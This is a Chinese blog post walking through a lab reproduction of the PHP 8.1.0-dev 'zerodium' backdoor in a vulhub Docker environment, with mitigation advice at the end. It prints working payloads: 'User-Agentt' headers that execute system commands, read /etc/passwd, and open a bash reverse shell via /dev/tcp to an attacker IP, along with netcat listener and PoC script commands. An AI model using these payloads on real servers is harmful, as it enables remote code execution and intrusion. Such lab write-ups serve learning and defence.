PHP-8.1.0-dev 后门命令执行漏洞复现

最新推荐文章于 2023-12-26 08:54:09 发布
最新推荐文章于 2023-12-26 08:54:09 发布
阅读量2k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shadow_DAI_990101/article/details/126772748
版权

PHP-8.1.0-dev 后门命令执行漏洞复现

文章目录

1. 概述

1.1 PHP

想必大家都了解,这里就不过多赘述了

1.2 漏洞简述

PHP 版本 8.1.0-dev 于 2021 年 3 月 28 日发布了带有后门的版本,但该后门很快被发现并删除。如果此版本的 PHP 在服务器上运行,攻击者可以通过发送 User-Agentt 标头来执行任意代码。

发现问题后恢复了原代码,但随后又被篡改了第二次。该漏洞将在任何运行受感染版本的 PHP 的网站中创建一个后门,使黑客能够在该网站上执行远程代码执行。

1.4 影响范围

PHP 8.1.0-dev

1.5 漏洞详情

2. 环境配置

2.1 方案一: vlufocus在线平台

登录vlufocus官网,搜索漏洞名称并启动

在这里插入图片描述

2.2 方案二: 在docker中搭建

在GitHub中搜索并下载vulhub

git clone https://github.com/vulhub/vulhub.git

  1. 进入漏洞目录,打开Powershell
    vulhub-master/php/8.1-backdoor/

  2. 使用docker-compose拉取漏洞环境
    docker-compose up -d

  3. 显示绿色的done表示搭建成功
    Done

    在这里插入图片描述

2.3 访问测试

这里采用方案二

在这里插入图片描述

3.1 漏洞复现 方法一:直接利用已知POC脚本

3.1.1 信息收集

  1. 使用nmap进行端口扫描

    在这里插入图片描述

  2. 进一步扫面,发现php版本

    在这里插入图片描述

  3. 在Exploit_DB库中搜索相关漏洞

    在这里插入图片描述

3.1.2 漏洞利用

POC脚本信息:

Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
Date: 23 may 2021
  Exploit Author: flast101
  Vendor Homepage: https://www.php.net/
  Software Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  Tested on version: 8.1.0-dev
  CVE : N/A
  Vulnerability references:
  https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
  https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

  1. 加载利用代码,在虚拟机中配置好python环境并运行

    ┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py

Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

  2. Reverse Shell

        ┌──(user㉿kali)-[~/Documents]
    └─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

    在这里插入图片描述

3.2 漏洞复现 方法二:BurpSuite 抓改包

  1. 改包用的payload

    第二个直接获取账户信息,这里自由发挥吧

    User-Agentt: zerodiumvar_dump(2*3)
    User-Agentt: zerodiumsystem(“cat /etc/passwd”)

  2. 建立监听

nc -lvp 192.168.0.118:8080

  1. 反弹Shell

    Payload如下:

User-Agentt: zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.0.116/6666 0>&1’”);

这时监听机应该就应该建立连接了Getshell!

4. 修复建议

1.将PHP更新至8.2.0及以上版本
2.官网重新下载安装一下应该也可以,因为后门已经被清除了、

5. 总结

没啥可说的,是一个无聊的漏洞

6. References

https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor (偷个懒,好敷衍的reference…)

东塔网络安全学院. (2021) ‘PHP-8.1.0-dev 后门命令执行漏洞复现’, CSDN, 20 Feb. Available at: https://blog.csdn.net/m0_48520508/article/details/…(Accessed: 22 Aug 2022).

ImShadowven
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z
06-30
MinGW-W64的32位安装包:i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z ,支持GCC8.1.0,线程模型为posix,异常处理模型为dwarf, 解压后即可使用。 mingw-w64 版本选择方法: 32位系统选择i686, 64位系统选择x86_64 线程模型:win32 : 没有C ++ 11多线程特性, posix : 支持C ++ 11多线程特性; 异常处理模型:32位系统推荐dwarf,64位系统推荐seh。seh 是新发明的,而 sjlj 则是古老的。seh 性能比较好,但不支持 32位。
i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z
08-06
MinGW-W64的32位安装包:i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z支持GCC8.1.0, 解压后即可使用。 利用下载工具下载的也是此压缩包,然后解压缩而已。 方便没梯子的!!!!
最新版windows mysql-8.1.0-winx64.zip
08-02
最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip
MinGW-W64-GCC-8.1.0-win10-64位c语言开发环境必备离线版
11-15
在线安装太慢了,就在些整理了一份离线版: win10 64位通常使用:x86_64-8.1.0-release-posix-seh-rt_v6-rev0.7z 下载后解压,然后将解压后的bin目录的全路径 添加到 系统环境变量中即可。
mingw-w64-8.1.0
08-03
mingw-w64-8.1.0 解决问题 VScode 检测到#include 错误,请更新includepath。 已为此翻译单元 禁用波形曲线的一种解决思路 需要注意要在系统变量的path中添加环境变量:G:\mingw\mingw64\bin 具体环境变量需要根据文件的存放位置进行修改
PHP 8.1.0-dev后门复现
weixin_46137328的博客
01-18 1672
0x01 简介PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来...
PHP-8.1.0-dev 后门命令执行漏洞复现_zerodiumvar_dump
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
12-26 567
如果你也想学习:黑客&网络安全的SQL攻防。
PHP/8.1.0-dev 后门命令执行漏洞复现
m0_63253040的博客
09-25 1597
题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。一开始这里我有个空格在:后面,所以执行不成功,去掉空格就成功了。没有发现什么点,目录扫描也没有结果,打开bp抓包。搜索PHP/8.1.0-dev
青少年CTF、PHP后门PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 1799
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行
PHP zerodium后门漏洞
xxx9686的博客
09-20 617
提交的请求包中,如果字符串以'zerodium'开头,那么该行将从useragent HTTP标头(“ HTTP_USER_AGENTT”)中执行PHP代码。
PHP 8.1.0-dev 开发版本后门事件
EC_Carrot的博客
07-18 468
漏洞背景 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 漏洞复现 发送如下数据包,可见代码var_dump(233*233);成功执行: GET / HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0
PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
X_IT666的博客
07-28 1191
漏洞介绍 关于漏洞PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-devPHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本:PHP 8.1.0-dev 配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor 漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用 信息收集 nmap扫描端口 访问http://192.168
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1099
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
命令执行漏洞超详细讲解
qinshuoyang1的博客
08-20 5215
应用有时需要调用一些执行系统命令的函数,如PHP中的`system`、`exec`、`shell_exec`、`passthru`、`popen`、`proc_popen`等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞
web安全】——命令执行漏洞(RCE)详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
PHP代码审计8—SSRF 漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-02 1403
SSRF基础学习
php8 alphine 容器内安装 pecl php编译工具
智行晓东的博客
03-03 881
pecl 编译安装 cd /usr/bin/ wget http://pear.php.net/go-pear.phar -O go-pear.php php go-pear.php ##回车默认安装 apk add autoconf dpkg-dev file g++ gcc libc-dev make php8-dev php8-pear re2c pcre pcre-dev ln-s /usr/bin/phpize8 /usr/local/bin/phpize \ ln-s /usr/bin/php

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值